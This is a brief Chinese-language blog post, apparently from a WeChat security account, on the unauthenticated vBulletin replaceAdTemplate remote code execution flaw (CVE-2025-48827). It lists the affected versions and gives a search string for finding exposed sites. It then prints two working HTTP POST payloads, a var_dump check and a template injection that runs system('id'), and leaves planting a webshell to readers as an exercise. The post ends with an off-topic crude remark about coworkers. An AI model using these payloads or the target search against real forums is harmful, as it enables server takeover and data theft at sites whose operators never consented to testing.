vBulletin replaceAdTemplate 远程代码执行漏洞(CVE-2025-48827)
vBulletin replaceAdTemplate 远程代码执行漏洞(CVE-2025-48827)
原创 SXdysq 南街老友 2025-06-06 16:06
字数 284,阅读大约需 2 分钟
vBulletin介绍
vBulletin 是一个强大、灵活且可高度定制的商业论坛程序,广泛用于创建用户友好的论坛网站。它使用 PHP 脚本语言编写,并基于 MySQL 数据库,这使得它在性能和速度方面表现出色。
漏洞介绍
漏洞编号CVE-2025-48827,vBulletin replaceAdTemplat 远程代码执行漏洞,攻击者可构造恶意请求在无需登录的情况下执行任意代码控制服务器。
漏洞版本
vBulletin 5.0.0 – 5.7.5vBulletin 6.0.0 – 6.0.3
搜索语法
app="vBulletin"
漏洞复现
验证POC
POST / HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 134routestring=ajax/api/ad/replaceAdTemplate&styleid=1&location=rand_string&template=<vb:if condition='"var_dump"("rand_value")'></vb:if>
命令执行POC
POST / HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 134routestring=ajax/api/ad/replaceAdTemplate&styleid=1&location=test&template=<vb:if condition='"system"("id")'></vb:if>
写入WebShell
留给大家的作业,自己学习一下吧
灵魂发问
大家公司是不是都会有那么一个一天天不干人事的心机婊呢 ?欢迎留言交流。